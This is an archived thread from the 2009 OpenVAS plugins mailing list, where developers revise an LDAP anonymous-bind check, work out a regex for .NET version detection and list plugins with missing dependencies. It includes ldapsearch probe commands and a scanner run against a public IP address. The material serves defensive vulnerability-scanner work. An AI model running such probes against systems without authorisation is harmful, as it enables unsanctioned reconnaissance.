So I may end up just querying the server and storing that information in
the db. We'll see. I'm still stumbling through the OPT docs and
learning how the protocol works.

More updates as they're available.

Thanks!
Shawn

From meyer at strato-rz.de Fri Mar 13 15:14:09 2009
From: meyer at strato-rz.de (Michael Meyer)
Date: Fri, 13 Mar 2009 15:14:09 +0100
Subject: [Openvas-plugins] OpenVAS plugin for ldap
In-Reply-To: <516BDF2EAB6A40D69F764D4487838ED1@bchandra>
References: <20090310135733.14043rl8gdsogb40@www.kattare.com> <200903131209.54930.jan-oliver.wagner@intevation.de> <516BDF2EAB6A40D69F764D4487838ED1@bchandra>
Message-ID: <20090313141409.GA16276@strato-rz.de>

*** Chandrashekhar B wrote:
> I have seen the plugin, it is not doing error checking before calling to
> report. Even if the pread or ldapsearch fails, it reports. We don't have
> LDAP setup right now, if you can give me the error response string for a
> failed ldapsearch, we could update the plugin.

http://leto.net/docs/ldap_error_code.php

mime at schlepp:~>ldapsearch -x -D "cn=foo,o=bla" -h $LDAP_HOST_EXIST
ldap_bind: Server is unwilling to perform (53)
        additional info: unauthenticated bind (DN with no password) disallowed

mime at schlepp:~> ldapsearch -x -h $LDAP_HOST_NOT_EXIST
ldap_bind: Can't contact LDAP server (-1)

mime at schlepp:~> ldapsearch -x -D "cn=admin,o=bla" -w wrong_pass -h $LDAP_HOST_EXIST
ldap_bind: Invalid credentials (49)

mime at schlepp:~> ldapsearch -x -h $LDAP_HOST_EXIST
# extended LDIF
#
# LDAPv3
# base <> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 32 No such object

# numResponses: 1

HTH

Micha

From jan-oliver.wagner at intevation.de Fri Mar 13 16:57:12 2009
From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner)
Date: Fri, 13 Mar 2009 16:57:12 +0100
Subject: [Openvas-plugins] OpenVAS plugin for ldap
In-Reply-To: <20090313141409.GA16276@strato-rz.de>
References: <20090310135733.14043rl8gdsogb40@www.kattare.com> <516BDF2EAB6A40D69F764D4487838ED1@bchandra> <20090313141409.GA16276@strato-rz.de>
Message-ID: <200903131657.14987.jan-oliver.wagner@intevation.de>

Hello,

I've updated the NASL script to be more verbose.
Especially it tells about the ldapsearch command, so you can easily copy & paste it and try it on command shell.

The script is not documented in the way that it explains why it is a Security Hole. The text says, it shows the information that can be pulled from the ldap, but in fact it is truncated and only the first couple of bytes are shown in the report.

Any LDAP experts around? ;-)

Best

Jan

On Friday, 13 March 2009, Michael Meyer wrote:
> *** Chandrashekhar B wrote:
> > I have seen the plugin, it is not doing error checking before calling to
> > report. Even if the pread or ldapsearch fails, it reports. We don't have
> > LDAP setup right now, if you can give me the error response string for a
> > failed ldapsearch, we could update the plugin.
>
> http://leto.net/docs/ldap_error_code.php
>
> mime at schlepp:~>ldapsearch -x -D "cn=foo,o=bla" -h $LDAP_HOST_EXIST
> ldap_bind: Server is unwilling to perform (53)
> additional info: unauthenticated bind (DN with no password) disallowed
>
> mime at schlepp:~> ldapsearch -x -h $LDAP_HOST_NOT_EXIST
> ldap_bind: Can't contact LDAP server (-1)
>
> mime at schlepp:~> ldapsearch -x -D "cn=admin,o=bla" -w wrong_pass -h $LDAP_HOST_EXIST
> ldap_bind: Invalid credentials (49)
>
> mime at schlepp:~> ldapsearch -x -h $LDAP_HOST_EXIST
> # extended LDIF
> #
> # LDAPv3
> # base <> with scope subtree
> # filter: (objectclass=*)
> # requesting: ALL
> #
>
> # search result
> search: 2
> result: 32 No such object
>
> # numResponses: 1

--
Dr. Jan-Oliver Wagner | ++49-541-335083-0 | http://www.intevation.de/
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Managing Directors: Frank Koormann, Bernhard Reiter, Dr.
Jan-Oliver Wagner

From meyer at strato-rz.de Fri Mar 13 21:35:47 2009
From: meyer at strato-rz.de (Michael Meyer)
Date: Fri, 13 Mar 2009 21:35:47 +0100
Subject: [Openvas-plugins] OpenVAS plugin for ldap
In-Reply-To: <200903131657.14987.jan-oliver.wagner@intevation.de>
References: <20090310135733.14043rl8gdsogb40@www.kattare.com>
 <516BDF2EAB6A40D69F764D4487838ED1@bchandra>
 <20090313141409.GA16276@strato-rz.de>
 <200903131657.14987.jan-oliver.wagner@intevation.de>
Message-ID: <20090313203547.GA9669@strato-rz.de>

*** Jan-Oliver Wagner wrote:

> The script is not documented in the way that it
> explains why it is a Security Hole.
> The text says, it shows the information that can be pulled from the ldap,
> but in fact it is truncated and only the first couple of bytes are shown in the
> report.
>
> Any LDAP experts around? ;-)

http://markmail.org/message/ry5kkd6mrpzgzj42
http://www.openldap.org/lists/openldap-software/200605/msg00191.html
http://kuerzer.de/hf3OS3QpP
http://kuerzer.de/gR18v5O9j
http://www.mail-archive.com/nessus at list.nessus.org/msg17819.html

Micha

From jan-oliver.wagner at intevation.de Mon Mar 16 15:37:31 2009
From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner)
Date: Mon, 16 Mar 2009 15:37:31 +0100
Subject: [Openvas-plugins] OpenVAS plugin for ldap
In-Reply-To: <20090313203547.GA9669@strato-rz.de>
References: <20090310135733.14043rl8gdsogb40@www.kattare.com>
 <200903131657.14987.jan-oliver.wagner@intevation.de>
 <20090313203547.GA9669@strato-rz.de>
Message-ID: <200903161537.34233.jan-oliver.wagner@intevation.de>

On Friday, 13 March 2009, Michael Meyer wrote:
> *** Jan-Oliver Wagner wrote:
> > The script is not documented in the way that it
> > explains why it is a Security Hole.
> > The text says, it shows the information that can be pulled from the ldap,
> > but in fact it is truncated and only the first couple of bytes are shown in the
> > report.
> >
> > Any LDAP experts around? ;-)
>
> http://markmail.org/message/ry5kkd6mrpzgzj42
> http://www.openldap.org/lists/openldap-software/200605/msg00191.html
> http://kuerzer.de/hf3OS3QpP
> http://kuerzer.de/gR18v5O9j
> http://www.mail-archive.com/nessus at list.nessus.org/msg17819.html

Seems we should downgrade the severity of this finding?

Best

Jan

--
Dr. Jan-Oliver Wagner | ++49-541-335083-0 | http://www.intevation.de/
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Managing Directors: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner

From meyer at strato-rz.de Mon Mar 16 16:21:05 2009
From: meyer at strato-rz.de (Michael Meyer)
Date: Mon, 16 Mar 2009 16:21:05 +0100
Subject: [Openvas-plugins] OpenVAS plugin for ldap
In-Reply-To: <200903161537.34233.jan-oliver.wagner@intevation.de>
References: <20090310135733.14043rl8gdsogb40@www.kattare.com>
 <200903131657.14987.jan-oliver.wagner@intevation.de>
 <20090313203547.GA9669@strato-rz.de>
 <200903161537.34233.jan-oliver.wagner@intevation.de>
Message-ID: <20090316152105.GA32494@strato-rz.de>

*** Jan-Oliver Wagner wrote:
> On Friday, 13 March 2009, Michael Meyer wrote:
> > *** Jan-Oliver Wagner wrote:
> > > The script is not documented in the way that it
> > > explains why it is a Security Hole.
> > > The text says, it shows the information that can be pulled from the ldap,
> > > but in fact it is truncated and only the first couple of bytes are shown in the
> > > report.
> > >
> > > Any LDAP experts around? ;-)
> >
> > http://markmail.org/message/ry5kkd6mrpzgzj42
> > http://www.openldap.org/lists/openldap-software/200605/msg00191.html
> > http://kuerzer.de/hf3OS3QpP
> > http://kuerzer.de/gR18v5O9j
> > http://www.mail-archive.com/nessus at list.nessus.org/msg17819.html
>
> seems we should downgrade the severity of this finding ?

IMHO, yes. Moreover, this plugin should be revised so that it produces fewer false positives. Currently, the plugin only determines if there is *any* output from ldapsearch.
If so, the plugin reports a security problem. Also if there came messages like "Could not Connect".

Micha

From christian.edjenguele at owasp.org Tue Mar 17 22:34:32 2009
From: christian.edjenguele at owasp.org (Christian Eric Edjenguele)
Date: Tue, 17 Mar 2009 22:34:32 +0100
Subject: [Openvas-plugins] REGEX expert
Message-ID: <49C01768.6080904@owasp.org>

I have the following script; it works, but the regex does not correctly handle the string I need (Version Information: Microsoft .NET Framework Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433), which contains the .NET and ASP version information. How can I extract it?

chrix at darkstar:~/Workspaces/OpenVAS/trunk/openvas-plugins/scripts$ sudo openvas-nasl -X remote-detect-MSdotNET-version2.nasl -t 216.134.222.61
[7016] plug_set_key:internal_send(0)['3 Services/www/80/working=1;
']: Socket operation on non-socket
[7016] plug_set_key:internal_send(0)['1 www/80/keepalive=yes;
']: Socket operation on non-socket
[7016] plug_set_key:internal_send(0)['3 dotNET/installed=1;
']: Socket operation on non-socket
[7016] plug_set_key:internal_send(0)['3 aspNET/installed=1;
']: Socket operation on non-socket
[7016] plug_set_key:internal_send(0)['3 dotNET/port=80;
']: Socket operation on non-socket
Version Information: Microsoft .NET Framework Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433

[7016] plug_set_key:internal_send(0)['1 SentData/(null)/INFO= Version Information: Microsoft .NET Framework Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433\r\n;
']: Socket operation on non-socket
[7016] plug_set_key:internal_send(0)['3 Success/(null)=1;
']: Socket operation on non-socket

--
Christian Eric Edjenguele
IT Security Software Engineer / IT Enterprise Software Architect
Mobile (IT): +39 3408580513
PGP KeyID: 0xB1654498
Key Server: http://pgp.mit.edu

From schandan at secpod.com Wed Mar 18 07:18:53 2009
From: schandan at secpod.com (chandan)
Date: Wed, 18 Mar 2009 11:48:53 +0530
Subject: [Openvas-plugins] REGEX expert
In-Reply-To: <3A353E49E651447DB382DF46C073E5B4@bchandra>
References: <3A353E49E651447DB382DF46C073E5B4@bchandra>
Message-ID: <49C0924D.9060506@secpod.com>

I found that the 'response' variable has a NULL compare. I think it should be 'reply'.

And for the regex, use the method below (easy to get the value by using eregmatch).

# eregmatch() returns a list: index 0 is the whole match, index 1 the captured version
dotNet_header = eregmatch(pattern:"Microsoft .NET Framework Version:([0-9.]+)", string:reply, icase:TRUE);
aspNet_header = eregmatch(pattern:"ASP.NET Version:([0-9.]+)", string:reply, icase:TRUE);

This will return the result in the form of a list. Find the output below for the regex.
dotNet_header [ 0: 'Microsoft .NET Framework Version:2.0.50727.1433', 1: '2.0.50727.1433' ]
aspNet_header [ 0: 'ASP.NET Version:2.0.50727.1433', 1: '2.0.50727.1433' ]

By using this you can set the version by pointing to index 1: dotNet_header[1] and aspNet_header[1]

Chandan

Chandrashekhar B wrote:
> -----Original Message-----
> From: openvas-plugins-bounces at wald.intevation.org
> [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Christian
> Eric Edjenguele
> Sent: Wednesday, March 18, 2009 3:05 AM
> To: openvas-plugins at wald.intevation.org
> Subject: [Openvas-plugins] REGEX expert
>
> I have the following script; it works, but the regex does not correctly
> handle the string I need (Version Information: Microsoft
> .NET Framework Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433),
> which contains the .NET and ASP version information. How can I extract it?
>
> chrix at darkstar:~/Workspaces/OpenVAS/trunk/openvas-plugins/scripts$ sudo
> openvas-nasl -X remote-detect-MSdotNET-version2.nasl -t 216.134.222.61
> [7016] plug_set_key:internal_send(0)['3 Services/www/80/working=1;
> ']: Socket operation on non-socket
> [7016] plug_set_key:internal_send(0)['1 www/80/keepalive=yes;
> ']: Socket operation on non-socket
> [7016] plug_set_key:internal_send(0)['3 dotNET/installed=1;
> ']: Socket operation on non-socket
> [7016] plug_set_key:internal_send(0)['3 aspNET/installed=1;
> ']: Socket operation on non-socket
> [7016] plug_set_key:internal_send(0)['3 dotNET/port=80;
> ']: Socket operation on non-socket
> Version Information: Microsoft .NET Framework
> Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433
>
> [7016] plug_set_key:internal_send(0)['1 SentData/(null)/INFO=
> Version Information: Microsoft .NET Framework
> Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433\r\n;
> ']: Socket operation on non-socket
> [7016] plug_set_key:internal_send(0)['3 Success/(null)=1;
> ']: Socket operation on non-socket
> _______________________________________________
Openvas-plugins mailing list
Openvas-plugins at wald.intevation.org
http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins

From bchandra at secpod.com Fri Mar 20 08:01:24 2009
From: bchandra at secpod.com (Chandrashekhar B)
Date: Fri, 20 Mar 2009 12:31:24 +0530
Subject: [Openvas-plugins] OpenVAS plugin for ldap
In-Reply-To: <20090316152105.GA32494@strato-rz.de>
References: <20090310135733.14043rl8gdsogb40@www.kattare.com><200903131657.14987.jan-oliver.wagner@intevation.de><20090313203547.GA9669@strato-rz.de><200903161537.34233.jan-oliver.wagner@intevation.de>
 <20090316152105.GA32494@strato-rz.de>
Message-ID:

We have updated ldapsearch.nasl to fix the false reporting and also downgraded the severity. General response might change according to the ldap server used, any testing feedback is appreciated.

Thanks,
Chandra.

-----Original Message-----
From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Michael Meyer
Sent: Monday, March 16, 2009 8:51 PM
To: openvas-plugins at wald.intevation.org
Subject: Re: [Openvas-plugins] OpenVAS plugin for ldap

*** Jan-Oliver Wagner wrote:
> On Friday, 13 March 2009, Michael Meyer wrote:
> > *** Jan-Oliver Wagner wrote:
> > > The script is not documented in the way that it
> > > explains why it is a Security Hole.
> > > The text says, it shows the information that can be pulled from the ldap,
> > > but in fact it is truncated and only the first couple of bytes are shown in the
> > > report.
> > >
> > > Any LDAP experts around? ;-)
> >
> > http://markmail.org/message/ry5kkd6mrpzgzj42
> > http://www.openldap.org/lists/openldap-software/200605/msg00191.html
> > http://kuerzer.de/hf3OS3QpP
> > http://kuerzer.de/gR18v5O9j
> > http://www.mail-archive.com/nessus at list.nessus.org/msg17819.html
>
> seems we should downgrade the severity of this finding ?

IMHO, yes. Moreover, this plugin should be revised so that it produces fewer false positives.
Currently, the plugin only determines if there is *any* output from ldapsearch. If so, the plugin reports a security problem. Also if there came messages like "Could not Connect".

Micha
_______________________________________________
Openvas-plugins mailing list
Openvas-plugins at wald.intevation.org
http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins

From goran.licina at lss.hr Mon Mar 30 11:13:19 2009
From: goran.licina at lss.hr (Goran Ličina)
Date: Mon, 30 Mar 2009 11:13:19 +0200
Subject: [Openvas-plugins] New plugin development team
Message-ID: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr>

Hi,

in agreement with Mr. Jan-Oliver Wagner and Mr. Vlatko Kosturjak we gathered a team for developing new OpenVAS plugins. Since we would like to start with writing plugins as soon as possible, Mr. Wagner suggested that we could for a start develop missing plugins that cause other OpenVAS plugins not to work properly.

So, can You please tell us on which plugin(s) we can start working on and what is the common procedure to do that?

Best regards,
Goran Licina

--
Laboratory for Systems and Signals
Department of Electronic Systems and Information Processing
Faculty of Electrical Engineering and Computing
University of Zagreb
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090330/885bff87/attachment.html

From michael.wiegand at intevation.de Mon Mar 30 14:39:37 2009
From: michael.wiegand at intevation.de (Michael Wiegand)
Date: Mon, 30 Mar 2009 14:39:37 +0200
Subject: [Openvas-plugins] New plugin development team
In-Reply-To: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr>
References: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr>
Message-ID: <20090330123937.GF25646@intevation.de>

* Goran Ličina [30. Mar 2009]:
> in agreement with Mr. Jan-Oliver Wagner and Mr. Vlatko Kosturjak we
> gathered a team for developing new OpenVAS plugins. Since we would
> like to start with writing plugins as soon as possible, Mr. Wagner
> suggested that we could for a start develop missing plugins that cause
> other OpenVAS plugins not to work properly.

That sounds very good, welcome to the OpenVAS project! :)

> So, can You please tell us on which plugin(s) we can start working on
> and what is the common procedure to do that?

A good idea would be to start openvasd, run a scan and have a look at the openvasd.messages file. In this file, openvasd will complain about missing dependencies. Then you can look into the file and determine what the missing dependency is supposed to do and whether it is important.

Another plugin developer, Michael Meyer (mime on IRC, I've put him in CC:) is working on missing dependencies as well, he can probably give you some pointers. Please do coordinate with him to avoid duplicate work.

It would be nice if you and/or your team could join us on IRC (#openvas on irc.oftc.net). This is usually the quickest way to get answers to questions.

I have attached part of the output of a feed QA script which I'm currently developing aimed at discovering unsatisfied includes or dependencies, I hope it is useful to you.

Feel free to contact me if you have any questions or suggestions.

Regards,

Michael

--
Michael Wiegand | OpenPGP: D7D049EC | Intevation GmbH - www.intevation.de
Neuer Graben 17, 49074 Osnabrück, Germany | AG Osnabrück, HR B 18998
Managing Directors: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner
-------------- next part --------------
Looking for plugins that have unavailable dependencies...
plugin ../scripts/cisco_vpn_client_detect.nasl depends on non-existant smb_hotfixes.nasl
plugin ../scripts/cubecart_xss.nasl depends on non-existant cubecart_detect.nasl
plugin ../scripts/cvs_file_existence_info_weak.nasl depends on non-existant cvs_pserver_heap_overflow.nasl
plugin ../scripts/cvs_malformed_entry_lines_flaw.nasl depends on non-existant cvs_pserver_heap_overflow.nasl
plugin ../scripts/DDI_IIS_Compromised.nasl depends on non-existant webmirror.nasl
plugin ../scripts/fs_policy_manager_7_dos.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/hydra_rexec.nasl depends on non-existant rexecd.nasl
plugin ../scripts/hydra_snmp.nasl depends on non-existant snmp_settings.nasl
plugin ../scripts/msrpc_dcom.nasl depends on non-existant msrpc_dcom2.nasl
plugin ../scripts/nav_installed.nasl depends on non-existant smb_registry_full_access.nasl
plugin ../scripts/nav_installed.nasl depends on non-existant smb_enum_services.nasl
plugin ../scripts/packeteer_packetshaper_web_dos.nasl depends on non-existant snmp_sysDesc.nasl
plugin ../scripts/php_fusion_6_00_110.nasl depends on non-existant php_fusion_detect.nasl
plugin ../scripts/putty_arbitrary_command_execution.nasl depends on non-existant putty_version_check.nasl
plugin ../scripts/relative_field_vulnerability.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/relative_field_vulnerability.nasl depends on non-existant snmp_sysDesc.nasl
plugin ../scripts/remote-detect-sybase-easerver-mgmt.nasl depends on non-existant sybase_easerver_detect.nasl
plugin ../scripts/rsync_path_sanitation_vuln.nasl depends on non-existant rsync_modules.nasl
plugin ../scripts/savce_installed.nasl depends on non-existant smb_registry_full_access.nasl
plugin ../scripts/savce_installed.nasl depends on non-existant smb_enum_services.nasl
plugin ../scripts/smb_explorer_version.nasl depends on non-existant smb_registry_full_access.nasl
plugin ../scripts/smb_explorer_version.nasl depends on non-existant smb_hotfixes.nasl
plugin ../scripts/smb_suspicious_files.nasl depends on non-existant smb_hotfixes.nasl
plugin ../scripts/sonicwall_vpn_client_detect.nasl depends on non-existant smb_hotfixes.nasl
plugin ../scripts/sophos_installed.nasl depends on non-existant smb_enum_services.nasl
plugin ../scripts/spybot_detection.nasl depends on non-existant smb_hotfixes.nasl
plugin ../scripts/spysweeper_corp_installed.nasl depends on non-existant smb_registry_full_access.nasl
plugin ../scripts/spysweeper_corp_installed.nasl depends on non-existant smb_enum_services.nasl
plugin ../scripts/sybase_blank_password.nasl depends on non-existant sybase_detect.nasl
plugin ../scripts/sympa_new_list_xss.nasl depends on non-existant sympa_detect.nasl
plugin ../scripts/webcalendar_info_disclosure.nasl depends on non-existant webcalendar_detect.nasl
plugin ../scripts/yahoo_dos.nasl depends on non-existant yahoo_msg_running.nasl
plugin ../scripts/apache_conn_block.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/apache_conn_block.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/apache_conn_block.nasl depends on non-existant macosx_SecUpd20040503.nasl
plugin ../scripts/apache_conn_block.nasl depends on non-existant macosx_SecUpd20040126.nasl
plugin ../scripts/apache_conn_block.nasl depends on non-existant macosx_SecUpd20041202.nasl
plugin ../scripts/apache_htpasswd_overflow.nasl depends on non-existant macosx_version.nasl
plugin ../scripts/apache_log_injection.nasl depends on non-existant redhat-RHSA-2003-244.nasl
plugin ../scripts/apache_log_injection.nasl depends on non-existant redhat_fixes.nasl
plugin ../scripts/apache_log_injection.nasl depends on non-existant macosx_SecUpd20040503.nasl
plugin ../scripts/apache_log_injection.nasl depends on non-existant macosx_SecUpd20040126.nasl
plugin ../scripts/apache_log_injection.nasl depends on non-existant macosx_SecUpd20041202.nasl
plugin ../scripts/apache_mod_include_priv_escalation.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/apache_mod_include_priv_escalation.nasl depends on non-existant macosx_SecUpd20041202.nasl
plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant mandrake_MDKSA-2004-065.nasl
plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant redhat-RHSA-2004-244.nasl
plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant macosx_SecUpd20041202.nasl
plugin ../scripts/apcupsd_overflows.nasl depends on non-existant apcnisd_detect.nasl
plugin ../scripts/asp_source_space.nasl depends on non-existant webmirror.nasl
plugin ../scripts/BEA_weblogic_Reveal_Script_Code.nasl depends on non-existant webmirror.nasl
plugin ../scripts/bugzilla_remote_exec.nasl depends on non-existant bugzilla_detect.nasl
plugin ../scripts/cachemgr_cgi.nasl depends on non-existant no404.nasl
plugin ../scripts/cubecart_lang_xss.nasl depends on non-existant cubecart_detect.nasl
plugin ../scripts/cutenews_145_xss.nasl depends on non-existant cutenews_detect.nasl
plugin ../scripts/cutenews_indexphp_xss.nasl depends on non-existant cutenews_detect.nasl
plugin ../scripts/cutenews_show_news_xss.nasl depends on non-existant cutenews_detect.nasl
plugin ../scripts/cutenews_xss.nasl depends on non-existant cutenews_detect.nasl
plugin ../scripts/cvstrac_account_deletion.nasl depends on non-existant cvstrac_detect.nasl
plugin ../scripts/cvstrac_cgi_overflows.nasl depends on non-existant cvstrac_detect.nasl
plugin ../scripts/cvstrac_db_plaintext_pass.nasl depends on non-existant cvstrac_detect.nasl
plugin ../scripts/cvstrac_filediff.nasl depends on non-existant cvstrac_detect.nasl
plugin ../scripts/cvstrac_history_overflow.nasl depends on non-existant cvstrac_detect.nasl
plugin ../scripts/cvstrac_invalid_ticket_dos.nasl depends on non-existant cvstrac_detect.nasl
plugin ../scripts/cvstrac_jail_escape.nasl depends on non-existant cvstrac_detect.nasl
plugin ../scripts/cvstrac_output_formatter_dos.nasl depends on non-existant cvstrac_detect.nasl
plugin ../scripts/cvstrac_ticket_title.nasl depends on non-existant cvstrac_detect.nasl
plugin ../scripts/cvstrac_timeline_overflow.nasl depends on non-existant cvstrac_detect.nasl
plugin ../scripts/e107_sql_injection.nasl depends on non-existant e107_detect.nasl
plugin ../scripts/ftpglob.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/ftpglob.nasl depends on non-existant solaris251_103603.nasl
plugin ../scripts/ftpglob.nasl depends on non-existant solaris251_x86_103604.nasl
plugin ../scripts/ftpglob.nasl depends on non-existant solaris26_106301.nasl
plugin ../scripts/ftpglob.nasl depends on non-existant solaris26_x86_106302.nasl
plugin ../scripts/ftpglob.nasl depends on non-existant solaris7_110646.nasl
plugin ../scripts/ftpglob.nasl depends on non-existant solaris7_x86_110647.nasl
plugin ../scripts/ftpglob.nasl depends on non-existant solaris8_111606.nasl
plugin ../scripts/ftpglob.nasl depends on non-existant solaris8_x86_111607.nasl
plugin ../scripts/hacker_defender.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/ibm_server_code.nasl depends on non-existant webmirror.nasl
plugin ../scripts/invision_power_board_calendar_sql_injection.nasl depends on non-existant invision_power_board_detect.nasl
plugin ../scripts/invision_pwb.nasl depends on non-existant invision_power_board_detect.nasl
plugin ../scripts/ipb_sql_disclosure.nasl depends on non-existant invision_power_board_detect.nasl
plugin ../scripts/jrun_getdir.nasl depends on non-existant webmirror.nasl
plugin ../scripts/limewire_remote_unauth_access.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/mailreader.nasl depends on non-existant webmirror.nasl
plugin ../scripts/mod_ssl_hook_functions_format_string_vuln.nasl depends on non-existant redhat-RHSA-2004-408.nasl
plugin ../scripts/mod_ssl_hook_functions_format_string_vuln.nasl depends on non-existant mandrake_MDKSA-2004-075.nasl
plugin ../scripts/mssql_brute_force.nasl depends on non-existant sybase_detect.nasl
plugin ../scripts/myserver_post_dos.nasl depends on non-existant www_too_long_url.nasl
plugin ../scripts/nfs_user_mount.nasl depends on non-existant showmount.nasl
plugin ../scripts/no404.nasl depends on non-existant webmirror.nasl
plugin ../scripts/openca_mult_sign_flaws.nasl depends on non-existant openca_html_injection.nasl
plugin ../scripts/openca_sign_verif.nasl depends on non-existant openca_html_injection.nasl
plugin ../scripts/openssh_afs.nasl depends on non-existant redhat-RHSA-2002-131.nasl
plugin ../scripts/PC_anywhere_tcp.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/phorum_register_xss.nasl depends on non-existant phorum_detect.nasl
plugin ../scripts/photopost_sql_injection.nasl depends on non-existant photopost_detect.nasl
plugin ../scripts/php_fusion_sql_inject.nasl depends on non-existant php_fusion_detect.nasl
plugin ../scripts/php_fusion_xss.nasl depends on non-existant php_fusion_detect.nasl
plugin ../scripts/phpgroupware_addressbook_flaw.nasl depends on non-existant phpgroupware_detect.nasl
plugin ../scripts/phpgroupware_html_injection2.nasl depends on non-existant phpgroupware_detect.nasl
plugin ../scripts/phpgroupware_html_injection.nasl depends on non-existant phpgroupware_detect.nasl
plugin ../scripts/phpgroupware_message_script_inject.nasl depends on non-existant phpgroupware_detect.nasl
plugin ../scripts/phpgroupware_plaintext_cookie_auth_vuln.nasl depends on non-existant phpgroupware_detect.nasl
plugin ../scripts/phpgroupware_remote_cmd.nasl depends on non-existant phpgroupware_detect.nasl
plugin ../scripts/phpgroupware_remote_file_include.nasl depends on non-existant phpgroupware_detect.nasl
plugin ../scripts/phpgroupware_server_side_exec_vuln.nasl depends on non-existant phpgroupware_detect.nasl
plugin ../scripts/phpgroupware_sql_injection.nasl depends on non-existant phpgroupware_detect.nasl
plugin ../scripts/phpgroupware_xss.nasl depends on non-existant phpgroupware_detect.nasl
plugin ../scripts/php_mail_func_header_spoof.nasl depends on non-existant redhat-RHSA-2002-214.nasl
plugin ../scripts/phpmyfaq_action_parameter_flaw.nasl depends on non-existant phpmyfaq_detect.nasl
plugin ../scripts/php_nuke_admin_cp.nasl depends on non-existant php_nuke_installed.nasl
plugin ../scripts/php_nuke_bb_smilies_passwd.nasl depends on non-existant php_nuke_installed.nasl
plugin ../scripts/php_nuke_sql_debug.nasl depends on non-existant php_nuke_installed.nasl
plugin ../scripts/php_split_mime.nasl depends on non-existant webmirror.nasl
plugin ../scripts/php_strip_tags_memory_limit_vuln.nasl depends on non-existant redhat-RHSA-2004-392.nasl
plugin ../scripts/php_strip_tags_memory_limit_vuln.nasl depends on non-existant redhat-RHSA-2004-395.nasl
plugin ../scripts/postnuke_news_xss.nasl depends on non-existant postnuke_detect.nasl
plugin ../scripts/rpc_kcms.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/samba_arbitrary_file_access.nasl depends on non-existant smb_nativelanman.nasl
plugin ../scripts/securenet_sensor_detect.nasl depends on non-existant macosx_version.nasl
plugin ../scripts/sendmail_header.nasl depends on non-existant solaris26_105395.nasl
plugin ../scripts/sendmail_header.nasl depends on non-existant solaris26_x86_105396.nasl
plugin ../scripts/sendmail_header.nasl depends on non-existant solaris7_107684.nasl
plugin ../scripts/sendmail_header.nasl depends on non-existant solaris7_x86_107685.nasl
plugin ../scripts/sendmail_header.nasl depends on non-existant solaris8_110615.nasl
plugin ../scripts/sendmail_header.nasl depends on non-existant solaris8_x86_110616.nasl
plugin ../scripts/sendmail_header.nasl depends on non-existant solaris9_113575.nasl
plugin ../scripts/sendmail_header.nasl depends on non-existant solaris9_x86_114137.nasl
plugin ../scripts/serendipity_xss.nasl depends on non-existant serendipity_detect.nasl
plugin ../scripts/servletExec_DoS.nasl depends on non-existant www_too_long_url.nasl
plugin ../scripts/sql_injection.nasl depends on non-existant webmirror.nasl
plugin ../scripts/squid_rdos.nasl depends on non-existant redhat-RHSA-2004-591.nasl
plugin ../scripts/teso_telnet.nasl depends on non-existant ms_telnet_overflow.nasl
plugin ../scripts/w32_spybot_worm_variant.nasl depends on non-existant os_fingerprint.nasl
plugin ../scripts/webapp_apage_cmd_exe.nasl depends on non-existant webapp_detect.nasl
plugin ../scripts/webcalendar_sql_injection.nasl depends on non-existant webcalendar_detect.nasl
plugin ../scripts/ws4e_too_long_url.nasl depends on non-existant www_too_long_url.nasl
plugin ../scripts/xoops_myheader_url_xss.nasl depends on non-existant xoops_detect.nasl
plugin ../scripts/xoops_viewtopic_xss.nasl depends on non-existant xoops_detect.nasl
plugin ../scripts/ypupdated_remote_exec.nasl depends on non-existant rpc_portmap.nasl
Warning: 112 plugins that depend on NONEXISTANT plugins found.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 198 bytes
Desc: not available
Url : http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090330/5e8ca783/attachment.pgp

From bchandra at secpod.com Mon Mar 30 14:40:50 2009
From: bchandra at secpod.com (Chandrashekhar B)
Date: Mon, 30 Mar 2009 18:10:50 +0530
Subject: [Openvas-plugins] New plugin development team
In-Reply-To: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr>
References: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr>
Message-ID: <55D893D00BE943C4BE1C6A8EDF7ABE25@bchandra>

Thanks for offering to help!

We had started on this exercise of reworking the missing Plugins and completed some of them.
